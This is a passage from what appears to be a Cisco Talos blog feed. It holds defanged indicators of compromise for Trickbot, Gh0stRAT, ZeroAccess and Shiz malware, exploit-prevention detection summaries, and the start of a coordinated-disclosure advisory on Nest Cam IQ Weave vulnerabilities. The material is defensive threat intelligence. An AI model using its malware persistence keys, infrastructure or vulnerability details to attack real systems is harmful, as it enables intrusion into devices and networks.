144[.]76[.]199[.]216
144[.]76[.]199[.]4316
43[.]231[.]4[.]716
192[.]0[.]47[.]5916
74[.]6[.]137[.]6516
172[.]217[.]7[.]13216
98[.]137[.]159[.]2716
95[.]181[.]178[.]1716
168[.]95[.]5[.]11615
74[.]125[.]141[.]2715
74[.]125[.]193[.]2615
67[.]195[.]228[.]10914
212[.]82[.]101[.]4613
168[.]95[.]5[.]21613
67[.]195[.]228[.]11113
67[.]195[.]230[.]3613
69[.]31[.]136[.]512
212[.]227[.]17[.]812
213[.]209[.]1[.]12912
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
250[.]5[.]55[.]69[.]in-addr[.]arpa16
250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org16
250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org16
mta5[.]am0[.]yahoodns[.]net16
250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net16
whois[.]iana[.]org16
250[.]5[.]55[.]69[.]bl[.]spamcop[.]net16
whois[.]arin[.]net16
250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org16
microsoft-com[.]mail[.]protection[.]outlook[.]com16
honeypus[.]rusladies[.]cn16
marina99[.]ruladies[.]cn16
sexual-pattern3[.]com16
coolsex-finders5[.]com16
super-efectindating1[.]com16
msx-smtp-mx1[.]hinet[.]net15
hotmail-com[.]olc[.]protection[.]outlook[.]com14
msx-smtp-mx2[.]hinet[.]net14
mx-eu[.]mail[.]am0[.]yahoodns[.]net13
mx-aol[.]mail[.]gm0[.]yahoodns[.]net13
eur[.]olc[.]protection[.]outlook[.]com13
web[.]de12
etb-1[.]mail[.]tiscali[.]it12
mx-ha02[.]web[.]de12
msa[.]hinet[.]net12
*See JSON for more IOCs
Files and or directories createdOccurrences
%HOMEPATH%16
%SystemRoot%\SysWOW64\config\systemprofile16
%SystemRoot%\SysWOW64\config\systemprofile:.repos16
%TEMP%\<random, matching '[a-z]{8}'>.exe16
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>16
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy)16
%TEMP%\edtpwsx.exe1
%TEMP%\ondzgch.exe1

File Hashes

1c331b81428107c325673ea4b19acdff598772d9e1069e09ca92cb88d223c326 1c916b795f49331678816ef6cfba0dbdbddd4b92a421e086ab2fe2ea095d10e9 398c23230679c69942c5d64c7aaf0e9e8ca3434d54559871f3a3a24fbd9ffa3c 4d660a6519c258074627f7d30a4878e15a4e621bd79f21a34f4550c54ef38c4e 5f4bd5a0728432e4731b9d2606bacb05d7c6f10ad926735f3e4d9dee10791f85 7d96ef5dfba65346fa3ffbcd23016f21e0a523e2215e963f21cc8c939c2e35a0 9bf983cc999b2a3bd029e21e445bca85853b58d66247c7221157fab41fbd19d8 9e5897942fac812b74be41b06b5e1cd1ff4e9fd9b71d10aadca3d5f368cda0d1 a8adbab4a72506f7343b7ff78a028fd26ec944a1d4de846ee0bf9651196d7724 a8f74812b66b89f9c0450b2f565d3ba2b417e7e10514618c3306de37749af886 ad34ec4764147faaee82935e142eedfe5569f88ef81195281539075a0f3c91ac b4f6aa14eb833c83413f72a4e901d0e92c7da45828c5438594693f68c2a3ebfe b75a2838b93b6ec47b27bd5c9798386775e9a3dfcac5c3562a7ff139eaa14ce3 be8a71e6dfa63485be4a848cf6d0bc1da15b20fb9735e0c0ed08e346840096e0 d62553c4ef53220d32af9e5eb1a0accca3ca6aac7e9f3539119fec0718edd65b f095b72dc6ba5c3c3f2e410d0f1766a8f6ebbecec1a4914b957f9a7225cc6c00

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Win.Malware.Trickbot-7112005-1

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Value Name: Blob
3
MutexesOccurrences
Global\VLock25
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
116[.]203[.]16[.]956
216[.]239[.]34[.]215
194[.]87[.]92[.]1844
188[.]137[.]122[.]834
185[.]158[.]115[.]754
185[.]158[.]115[.]494
216[.]239[.]32[.]213
216[.]239[.]38[.]213
216[.]239[.]36[.]213
185[.]158[.]115[.]873
188[.]137[.]122[.]683
195[.]133[.]146[.]1563
94[.]242[.]206[.]2043
198[.]27[.]74[.]1462
50[.]16[.]229[.]1402
194[.]87[.]232[.]1462
23[.]21[.]121[.]2191
104[.]20[.]17[.]2421
54[.]243[.]147[.]2261
54[.]235[.]124[.]1121
104[.]20[.]16[.]2421
23[.]23[.]243[.]1541
3[.]224[.]145[.]1451
34[.]196[.]181[.]1581
23[.]23[.]83[.]1531
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
ipinfo[.]io6
ip[.]anysrc[.]net6
api[.]ipify[.]org5
myexternalip[.]com3
icanhazip[.]com2
ipecho[.]net2
checkip[.]amazonaws[.]com2
wtfismyip[.]com2
elb097307-934924932[.]us-east-1[.]elb[.]amazonaws[.]com2
checkip[.]us-east-1[.]prod[.]check-ip[.]aws[.]a2z[.]com1
Files and or directories createdOccurrences
%APPDATA%\winapp\Modules25
%System32%\Tasks\services update25
%APPDATA%\winapp\client_id25
%APPDATA%\winapp\group_tag25
%APPDATA%\winapp25
%APPDATA%\WINAPP\<original file name>.exe25
%SystemRoot%\Tasks\services update.job23

File Hashes

00c98d727a85576416dba2a3a68010f986ae276935435e6d9eb02d33fb71b3a3 0143365726dffade4573b49e8c816d414c8ca96567a8163cbb714a4b9c18df2d 051eeb1a5f4ef84caff3c5a7abcebb1839569516480df43c929aba282eb8ecb2 0fff84cfd0c674f7d55a39cb6be3bb7fccb3549dbfd9bc8f8b4c8c6307cc5102 112a18bcbc8424b2bdb7ea574f5696288d28a28dda3f0aaa9894a84285c932aa 11513df12b19240af3485b6b0d0c871c305e2644e6503770baf8fb2949542462 19910cf1b0fb40f8143c459e93a6110393b502de81646ed7685c7a0766e4823d 2807fea0af4c94116f0677eb94d798b6f40c3a3cc50ed8d2d2184a061ce30904 292920637d78485e4053b4a056d569f2e17cb8ab531f3372d18402c35fd735bf 30938782dd1ae8ff1a35c17821860745f613a5267e18171e7336d1c6d5f5b6b1 30f321827bea98609847dc047de756f7b86074bb3f5c6e4c7875f25db5dcd627 362d936eebd48241b9e3b6ae0f8650365af42aa307320438ae170862750b2a08 3dd50fe971d7256311dab97ac7afeb0a6ec91de2feccb125eb09ac8a22947005 3e98c771dd86669152fb58cfc0ecd7d264426ebe125ee4d96893efad5af5d236 3ecf64c343752bfbed1a8984cfb207309133df964da0b2e086509e8aed167a66 541729295b97eaa2ec3a566c2095b5e4c03239d9b1235d4a2b6331f3dd986f75 639adafd87d067c1cc5c5d1be870f3800e719637dab20e435f379fc86b268d15 653fc5565b1e8746ddaa507722815fc225ce5c327fa69dbbdaf8924880197035 6809cf34ac7fa454a8d8c25482c7a9acb44be1222bc89f2d478a953d93f63f3d 74547a954562f29ea05230900daab9c043e088fd1a38cb2d077ba4624ef51523 7a7029415edf56936d5eaf003f413a0b778fbc279168cc7cc5e3166a14aaf69a 7be5520d05f7f6afc0dbdf945faa7c93dbc3d3394a6fc8fc30532a6d241f10a1 7bf167e2fd1ad3b45e42fcfce427c702cdb4df6e96602a183fee57d777140a18 854124fe1ae699a3dfd99b89a0b44101e74039ea8f06c781254f4aeca07b7013 8a58ff91b277c4b10565d90fa8e0d847759276fa77983762337dc6bf916aa78e
*See JSON for more IOCs

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
Wsa N/A

Screenshots of Detection

AMP


ThreatGrid




Win.Malware.Gh0stRAT-7109635-2

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STUVWX 26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STUVWX
Value Name: MarkTime
26
MutexesOccurrences
193.112.13.217:7788:Stuvwx26
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
193[.]112[.]13[.]21726

File Hashes

0cc11eb852f66920b4a4a35dc34b4e05f3612640b1963bd0ef8088022e2451f7 103960c11c696e1ed51771fec28b70d5cd0c1feb071575e4122827ac7541092b 1156fabd2305bd3ce5b218a59c3f3cfd99671dc8323fda13c156aebf26ee3ed8 11978ef69a330b0d4cc544f48bafbca5125019fe147fcaf2db0bd72fe94c4b4a 164c0c94d252f388ab7825a8bd9abf8cacc45cbf34281edb72951982874591ab 1af0bbdad437c6f711447ccb84444b92df5ba237acc0b33f6eebe0d48fd2f5a2 1ef070ae000ecca44fd13b1c3b642a7a5ef8894becc9a228f2aba33c04f267d5 24436d1687d5a814d3552f9fe6aed8d3778a66888508d1685d7c8c39d4b3b5a5 249cea1515c2c625b5e117a9495cce088f64dfe39dfab2b9d47d9071e2516900 2512e7506467e005bda030357121e832ff0dddc6a670ae4c732bac8345a0e2cf 265c64b98cd0d8515c829654ea931d751e9526b61f45f1d4799c41578f94534c 26f34567a93de01d7e6853e9ae31eb0f1848dee525b0ee605e1c1884accc4982 274d09e6e43dc96ba17a782a30afd525c972f3ad50e73655d8cbfe94ea97b481 2add1b8118caae8e35384758ffabf7fb9cd5eed7e7ae6189572f92993176cf7c 2c771b1e0003485b554e8014b428c9d53ad93d457c04c96b9e514f0f33e2e6ba 2cdd4e59d78f0a3537c1e1c5a7b9fb4c369a20d79a057568a51a2cbebb2f8241 2dae697a1aa350218fb9c4c6ed9d28caa9eff1ad7bfbd0feb32dc523e5c7baf9 3073891867551a6f111eb2f8af3e02729bf97627da4d019fc289433de4cfc35b 30fe5c510a0dc5ad89fcd66491ff24f605a90a2c4a53c67a9969fe15a4a5d0a7 313e7c484e87f221fe3e7af0aab2e17eac7c5a1f1a6c6fcf96140f1a24ba95ba 3176a16b8d3fdcd6162a24ea2979f82d8d1ec4bb98e15c299affd56704bf30d6 32824a80e061fa64a2cc928d3fbde4f742dfb22b4bd9daa13c2e5ab80697c836 333afdc84193d7b7b0d4d1c1e94fcd38426660db5f0fe8fb6dff57d0436a72eb 34e270be03c14465005a11e6eeca6c6c6437f24d9d0a120387cdc759519ad751 352d10cb6917a8bd67bd4054b5307ee38caa2ca63be034edda31371954fccb70
*See JSON for more IOCs

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
Wsa N/A

Screenshots of Detection

AMP


ThreatGrid




Win.Packed.Zeroaccess-7109532-0

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: DeleteFlag
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: DeleteFlag
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BROWSER
Value Name: Start
19
<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32
Value Name: ThreadingModel
19
<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32 19
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
19
<HKLM>\SOFTWARE\CLASSES\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\INPROCSERVER32 19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Type
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: ErrorControl
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: Type
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: ErrorControl
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: Type
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: ErrorControl
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: DeleteFlag
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Type
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: ErrorControl
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Type
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: ErrorControl
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000010
Value Name: PackedCatalogItem
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000009
Value Name: PackedCatalogItem
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000008
Value Name: PackedCatalogItem
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000007
Value Name: PackedCatalogItem
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000006
Value Name: PackedCatalogItem
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000005
Value Name: PackedCatalogItem
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000004
Value Name: PackedCatalogItem
19
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
222[.]254[.]253[.]25419
83[.]133[.]123[.]2015
88[.]254[.]253[.]25415
92[.]254[.]253[.]25415
117[.]254[.]253[.]25415
115[.]254[.]253[.]25415
87[.]254[.]253[.]25415
134[.]254[.]253[.]25414
119[.]254[.]253[.]25414
184[.]254[.]253[.]25412
180[.]254[.]253[.]25412
182[.]254[.]253[.]25412
190[.]254[.]253[.]25412
206[.]254[.]253[.]25412
166[.]254[.]253[.]25412
197[.]254[.]253[.]25412
135[.]254[.]253[.]25411
178[.]148[.]144[.]159
74[.]194[.]69[.]929
68[.]173[.]181[.]1919
188[.]67[.]123[.]1009
78[.]221[.]193[.]658
198[.]96[.]34[.]468
68[.]64[.]113[.]1048
24[.]35[.]22[.]128
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
j[.]maxmind[.]com15
uikvdwhrextuxymklwbrodjzhj[.]com1
xikzzyxnfkaepapadgned[.]com1
Files and or directories createdOccurrences
\systemroot\assembly\GAC_32\Desktop.ini19
\systemroot\assembly\GAC_64\Desktop.ini19
%System32%\LogFiles\Scm\e22a8667-f75b-4ba9-ba46-067ed4429de819
%SystemRoot%\assembly\GAC_32\Desktop.ini19
%SystemRoot%\assembly\GAC_64\Desktop.ini19
\$Recycle.Bin\S-1-5-1819
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f19
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\@19
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\L19
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\U19
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\n19
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f19
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\@19
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\L19
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\U19
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\n19
\RECYCLER\S-1-5-18\$ad714f5b8798518b3ccb73fd900fd2ba\@17
\RECYCLER\S-1-5-18\$ad714f5b8798518b3ccb73fd900fd2ba\n17
\RECYCLER\S-1-5-21-1258710499-2222286471-4214075941-500\$ad714f5b8798518b3ccb73fd900fd2ba\@17
\RECYCLER\S-1-5-21-1258710499-2222286471-4214075941-500\$ad714f5b8798518b3ccb73fd900fd2ba\n17
%SystemRoot%\assembly\GAC\Desktop.ini17
4.@ (copy)1
8.@ (copy)1
80000000.@ (copy)1
80000032.@ (copy)1
*See JSON for more IOCs

File Hashes

64f81a35325dd38c136a632f0e23d167407a0c4963a70761d4ab5707775f0d23 67ebc3153ede004c1af8b82ecd6f4713573f4c29b4a84c0500d761f483ad9172 688db1253d2dcdaf11bb2e8f03790dea9b10625b14b20531f4ea108801066f62 78951871e9a63fa3907da13165bab1119addd1ce8a3b376afae47b532e5d3653 7d8a67472d130e64d41205a7c1e5263b4fe6a4c6dc2b413618fd9e38ce47f536 8eea2b29e69058398957d5972b62b47947d090c2610bcd45ee593fa92bf25004 91fff0045ed0ac9433217ee7dd1f5ede0554588995892e026044d8d9f9371e1a 9a254fc4e4ca669bab5ad0a830ab43a9ebee6b835fdf794f76a8575d2ca8d548 9db192e4eced11fc3f84d6d8f6302e0230798993bc2b9efca6170428fba13906 a1335dcc4001df7691151413c8c1280dcda1a28a5bd21e82673de4d7560116b7 a2f377e3ff205bc71b5c2a88957578d2a6fb9d390d7ba19fa5117fb0f17736b3 c11c70ca57c92e7224b2c011bb8559d5214ff644fec730a52e02eee172a8a043 c443515f2c11f9cce0be0bd88532bd2b0885d2836bb0b5abb4c2e9198bb2121b d17a1fb8e452ae4fce1f2763a32b209b6663c600dcf253fd1e943e481ca90e63 dcfd777c230140e79392ba5adf4f6aa9ae249d68eb18cf2ba3b74eca47a2b3c2 df6e0399978745daad9974c24eecc3859740bc2e2ece4a7ec970cefcdd5a5bbe eb5d5d7b8119f0819a9f00bd20e3c200e9e938a7705bcad0afc86f254d62a78c efbf80ac6287c82b3231e87957271cadf5c5130eeea7b2e456ffa8b002cbde62 f12f6a6b3358a8dee157fa6bc7170d94cbf2e6f890c86791af20c1a841c01c17 f77e3f0bf61edecfc8f50904e19b9746ba78be95520288d824b61777b04649c6

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
Wsa N/A

Screenshots of Detection

AMP


ThreatGrid




Win.Trojan.Shiz-7108197-0

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT
Value Name: 67497551a
18
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: 98b68e3c
18
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: userinit
18
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: System
18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: load
18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: run
18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: userinit
18
MutexesOccurrences
Global\674972E3a18
Global\MicrosoftSysenterGate718
internal_wutex_0x0000012018
internal_wutex_0x0000042418
internal_wutex_0x0000047418
internal_wutex_0x000004a018
\BaseNamedObjects\Global\C3D74C3Ba17
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
23[.]253[.]126[.]5818
208[.]100[.]26[.]25118
104[.]239[.]157[.]21018
45[.]77[.]226[.]20918
198[.]187[.]30[.]24914
35[.]231[.]151[.]712
13[.]107[.]21[.]20010
35[.]229[.]93[.]469
204[.]79[.]197[.]2008
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
MAMASUFEXIX[.]EU18
FODAVIBUSIM[.]EU18
LYKONURYMEX[.]EU18
qetoqolusex[.]eu18
PUPUCUVYMUP[.]EU18
vocupotusyz[.]eu18
gaherobusit[.]eu18
MAGOFETEQUB[.]EU18
RYCUCUGISIX[.]EU18
KEJYWAJAZOK[.]EU18
puvewevodek[.]eu18
gahyfesyqad[.]eu18
MAVEJYKIDIJ[.]EU18
lyvevonifun[.]eu18
rydopapifel[.]eu18
kemimojitir[.]eu18
CIQUKECYWIV[.]EU18
FOXOFEWUTEQ[.]EU18
tucyzogojat[.]eu18
JEJYKAXYMOB[.]EU18
QEKUSAGIGYZ[.]EU18
tuwypagupeb[.]eu18
FOBATESOHEK[.]EU18
NOVOMYFEXIJ[.]EU18
dixyjohevon[.]eu18
*See JSON for more IOCs
Files and or directories createdOccurrences
%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp18
%SystemRoot%\AppPatch\ffiqrh.exe1
%SystemRoot%\AppPatch\jshtht.exe1
%SystemRoot%\AppPatch\akumbd.exe1
%SystemRoot%\AppPatch\rkhhmxr.exe1
%SystemRoot%\AppPatch\pvsvlhr.exe1
%SystemRoot%\AppPatch\hcbpdh.exe1
%SystemRoot%\AppPatch\suupehv.exe1
%SystemRoot%\AppPatch\atvoia.exe1
%SystemRoot%\AppPatch\xyovdf.exe1
%SystemRoot%\AppPatch\qoatnug.exe1
%SystemRoot%\AppPatch\stfvdxf.exe1
%SystemRoot%\AppPatch\crsadq.exe1
%SystemRoot%\AppPatch\iqxtlwt.exe1
%SystemRoot%\AppPatch\vgabmas.exe1
%SystemRoot%\AppPatch\cxglomg.exe1
%SystemRoot%\AppPatch\mrfdmsf.exe1
%SystemRoot%\AppPatch\eodhsml.exe1
%SystemRoot%\AppPatch\bjihnwq.exe1

File Hashes

15e38b549194635dbbce0ddc2fa97744992498292843924d0ef12fb1804a285c 90fb3fc2fa229953c808954a8eec46b36f1edc0f41ab088c82ea755ffa3c43c2 9ca9c80c7aef1de747e8fb0fbe2fdabe0242862341eac562799b96f94830bd7a a798d57162ee4fac07d2e23a16f9d0557d39f6c615a33add2a8f570177ae250e b45da6a6c26ccecac46deeceed64bea1dc7753ebbd6fb93ad33048e0f8587f95 ba8e2507b98e11681912eb982779c5791bfd084f1683d0ec211f187c04444b4b bf6c06b4720c871f38fe90fc4c2dd2a17fd3879b37668facd78f433309123094 c0b1f1dcd503c8e254cbc80478848db14d2ab731df0a3d3cd185d5df43727d54 cab99b6945c6ee017c2297f13f5962ff2be066c3c9f4b812f1183334ab133de0 cefb5097f6431abfd8ecaa842f8fd18e7c37b585c90ed7dab5cc58c985f327ce d736eb2fa68eb8da82c3823e90bee6fb374f00d59b5ce26df9a8f8f6e807bf39 e4c8b631c928eec873f54c2811315e48962a8f5e067e3f820e22fbfbb04755eb e7df207595977cf6802d5d039c76a91ace32521f290d115c06325bb8a72ce18e ea0ea261f2a0211dc179b23bf18609749df13f024db3384cf1f7f54d09a3e21d ea9b003f2dd1f2293add17f6607370a130d3efff27d55c5068c7ac8abcbfb76b eeb8342fd7c3ee5b7bb9b714899dc0b2b97597562022015b9d1d2464e7cd55d3 fce2a9dee62b71966aca7874ff8f37066a0323c73e5e524162b36b114a92894f fdbae139d64ee88eacf6ade8b366666432bc944430ab7dd0cf1af7156cb7d316

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid



Umbrella




Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
CVE-2019-0708 detected - (1553)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Kovter injection detected - (1465)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Process hollowing detected - (1288)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Madshi injection detected - (1157)
Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
Trickbot malware detected - (742)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Dealply adware detected - (417)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Gamarue malware detected - (151)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Installcore adware detected - (75)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Excessively long PowerShell command detected - (72)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
PowerShell file-less infection detected - (67)
A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.

Vulnerability Spotlight: Multiple bugs in OpenWeave and Nest Labs Nest Cam IQ indoor camera

$
0
0

Lilith Wyatt and Claudio Bozzato of Cisco Talos discovered these vulnerabilities.

Cisco Talos recently discovered multiple vulnerabilities in the Nest Cam IQ Indoor camera. One of Nest Labs’ most advanced internet-of-things devices, the Nest Cam IQ Indoor integrates Security-Enhanced Linux in Android, Google Assistant, and even facial recognition all into a compact security camera. It primarily uses the Weave protocol for setup and initial communications with other Nest devices over TCP, UDP, Bluetooth and 6lowpan. Most of these vulnerabilities lie in the weave binary of the camera, however, there are some that also apply to the weave-tool binary. It is important to note that while the weave-tool binary also lives on the camera and is vulnerable, it is not normally exploitable as it requires a local attack vector (i.e. an attacker-controlled file) and the vulnerable commands are never directly run by the camera.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Weave and Nest Labs to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Nest Labs Nest Cam IQ Indoor Weave TCP connection denial-of-service vulnerability (TALOS-2019-0810/CVE-2019-5043)

An exploitable denial-of-service vulnerability exists in the Weave daemon of the Nest Cam IQ Indoor, version 4620002. A set of TCP connections can cause unrestricted resource allocation, resulting in a denial of service. An attacker can connect multiple times to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Nest Labs Nest Cam IQ Indoor Weave legacy pairing information disclosure vulnerability (TALOS-2018-0797/CVE-2019-5034)

An exploitable information disclosure vulnerability exists in the Weave legacy pairing functionality of the Nest Cam IQ Indoor, version 4620002. A set of specially crafted Weave packets can cause an out-of-bounds read, resulting in information disclosure. An attacker can send specially crafted packets to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Nest Labs Nest Cam IQ Indoor Weave PASE pairing brute force vulnerability (TALOS-2018-0798/CVE-2019-5035)

An exploitable information disclosure vulnerability exists in the Weave PASE pairing functionality of the Nest Cam IQ Indoor, version 4620002. A set of specially crafted weave packets can brute force a pairing code, resulting in greater Weave access and potentially full device control. An attacker can send specially crafted packets to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Nest Labs Nest Cam IQ Indoor Weave KeyError denial-of-service vulnerability (TALOS-2018-0799/CVE-2019-5036)

An exploitable denial-of-service vulnerability exists in the Weave error reporting functionality of the Nest Cam IQ Indoor, version 4620002. A specially crafted weave packet can cause an arbitrary Weave Exchange Session to close, resulting in a denial of service. An attacker can send a specially crafted packet to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Nest Labs Nest Cam IQ Indoor WeaveCASEEngine::DecodeCertificateInfo denial-of-service vulnerability (TALOS-2018-0800/CVE-2019-5037)

